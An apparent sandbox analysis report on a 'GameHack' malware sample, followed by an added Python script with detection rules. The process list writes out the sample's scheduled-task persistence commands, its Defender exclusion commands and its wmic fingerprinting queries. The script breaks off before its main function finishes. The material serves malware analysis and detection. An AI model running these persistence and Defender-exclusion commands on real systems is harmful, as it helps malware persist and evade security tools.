| File created | C:\Windows\uk-UA\fontdrvhost.exe | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File created | C:\Windows\uk-UA\5b884080fd4f94 | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe
"C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe"
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe
"C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe"
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe
"C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe"
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe
"C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\chainReviewdhcp\mJEJ7PbY35CMaAu5227dvHv.vbe"
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
"C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic diskdrive get model,serialnumber
C:\Windows\System32\Wbem\wmic.exe
wmic path Win32_Keyboard get Description,DeviceID
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic path Win32_PointingDevice get Description,PNPDeviceID
C:\Windows\System32\Wbem\wmic.exe
wmic path Win32_PointingDevice get Description,PNPDeviceID
C:\Windows\System32\Wbem\wmic.exe
wmic path Win32_DesktopMonitor get Description,PNPDeviceID
C:\Windows\System32\Wbem\wmic.exe
wmic get name
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\DaJttDh54LCmoatNZvevDoWyEmexKWgun1WAXP2cdZM0egnWJQQpZtVxW.bat" "
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
"C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor/runtimesvc.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\chainReviewdhcp\LJrjU6BhAd6hMsY1uw5hl2I0p3Jh.bat" "
C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
"C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\upfc.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\upfc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\igghsuce\igghsuce.cmdline"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\upfc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Users\Default\Templates\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Default\Templates\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Templates\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Defender\cmd.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Windows\security\conhost.exe'" /f
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBA86.tmp" "c:\Windows\System32\CSCD8D644E09FC241AA8996A8F16E59FB8.TMP"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\security\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Windows\security\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Windows\uk-UA\fontdrvhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Internet Explorer\SIGNUP\sihost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\uk-UA\fontdrvhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Windows\uk-UA\fontdrvhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\SIGNUP\sihost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 12 /tr "'C:\Program Files\Google\Chrome\Application\sppsvc.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\sppsvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 6 /tr "'C:\Program Files\Google\Chrome\Application\sppsvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Internet Explorer\SIGNUP\sihost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Security\cmd.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default User\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\OfficeClickToRun.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\Windows Security\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MpDefenderCoreProtionM" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Mail\MpDefenderCoreProtion.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Security\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MpDefenderCoreProtion" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\MpDefenderCoreProtion.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MpDefenderCoreProtionM" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Mail\MpDefenderCoreProtion.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\SIGNUP\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Multimedia Platform\cmd.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\SIGNUP\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Multimedia Platform\cmd.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\upfc.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Templates\csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\cmd.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\security\conhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\uk-UA\fontdrvhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Google\Chrome\Application\sppsvc.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\OfficeClickToRun.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\RuntimeBroker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\OfficeClickToRun.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Mail\MpDefenderCoreProtion.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\cmd.exe'
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\SIGNUP\dllhost.exe'" /rl HIGHEST /f
C:\Recovery\WindowsRE\OfficeClickToRun.exe
"C:\Recovery\WindowsRE\OfficeClickToRun.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "runtimesvcr" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\runtimesvc.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "runtimesvc" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\runtimesvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "runtimesvcr" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\runtimesvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "runtimesvcr" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "runtimesvc" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "runtimesvcr" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\taskhostw.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Internet Explorer\SIGNUP\sihost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\cmd.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\SIGNUP\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\runtimesvc.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\k0tbFJWvqp.bat"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
"C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe"
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
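The process list above lays out the persistence and evasion sequence in the clear: each dropped binary is named after a Windows system executable but written to an unrelated directory, registered with schtasks twice (a MINUTE task with a 6 to 14 minute interval and an ONLOGON task at run level HIGHEST), then added as a Defender exclusion with Add-MpPreference, while wmic hardware queries fingerprint the host and a w32tm /stripchart against localhost stands in for a sleep in the batch file. The Python script below is an added example, not part of the sandbox report or of the malware, that runs rule-based triage over a constructed sample of those command lines (copied from the list above, plus one benign task constructed to show the rules stay quiet). The rule names, the 15-minute interval threshold and the list of impersonated binary names are this example's own assumptions, not sandbox signatures.

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Added example, not part of the sandbox report: rule-based triage of process
# command lines. Rule names, the interval threshold and the impersonated-name
# list below are this example's own assumptions, not sandbox signatures.

# Windows binaries that the dropped copies impersonate; a file with one of these
# names outside the real system directories is treated as masquerading.
SYSTEM_BINARY_NAMES = {
    "taskhostw.exe", "upfc.exe", "csrss.exe", "cmd.exe", "conhost.exe",
    "fontdrvhost.exe", "sihost.exe", "sppsvc.exe", "dllhost.exe",
    "runtimebroker.exe", "officeclicktorun.exe",
}
LEGIT_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
SHORT_INTERVAL_MINUTES = 15  # assumption: relaunching more often than this is suspicious

SCHTASKS_RE = re.compile(
    r'schtasks(?:\.exe)?\s+/create\s.*?/tn\s+"(?P<name>[^"]+)".*?'
    r'/sc\s+(?P<sched>\w+)(?:\s+/mo\s+(?P<mo>\d+))?.*?'
    r'/tr\s+"\'?(?P<target>[^"\']+)\'?"',
    re.IGNORECASE,
)
EXCLUSION_RE = re.compile(
    r"Add-MpPreference\s+-ExclusionPath\s+['\"](?P<path>[^'\"]+)", re.IGNORECASE)
WMIC_HW_RE = re.compile(
    r"^wmic\b.*\b(diskdrive|Win32_Keyboard|Win32_PointingDevice|Win32_DesktopMonitor)\b",
    re.IGNORECASE)
W32TM_RE = re.compile(r"w32tm\s+/stripchart\s+/computer:localhost", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str
    cmdline: str


def _exe_path(target: str) -> str:
    """Return the executable part of a /tr value, dropping any arguments."""
    m = re.match(r"(.+?\.exe)", target, re.IGNORECASE)
    return (m.group(1) if m else target).strip()


def _is_masquerade(path: str) -> bool:
    """True if the file name mimics a system binary but lives somewhere else."""
    p = PureWindowsPath(path)
    return p.name.lower() in SYSTEM_BINARY_NAMES and str(p.parent).lower() not in LEGIT_DIRS


def analyze(cmdlines):
    """Run every rule over each command line and collect the findings."""
    findings = []
    for cmd in cmdlines:
        m = SCHTASKS_RE.search(cmd)
        if m:
            exe = _exe_path(m["target"])
            elevated = " [HIGHEST]" if re.search(r"/rl\s+HIGHEST", cmd, re.I) else ""
            if _is_masquerade(exe):
                findings.append(Finding("schtasks-masquerade",
                                        f'task "{m["name"]}"{elevated} -> {exe}', cmd))
            if m["sched"].upper() == "MINUTE" and m["mo"] and int(m["mo"]) <= SHORT_INTERVAL_MINUTES:
                findings.append(Finding("schtasks-short-interval",
                                        f'every {m["mo"]} min -> {exe}', cmd))
        m = EXCLUSION_RE.search(cmd)
        if m:
            findings.append(Finding("defender-exclusion", m["path"], cmd))
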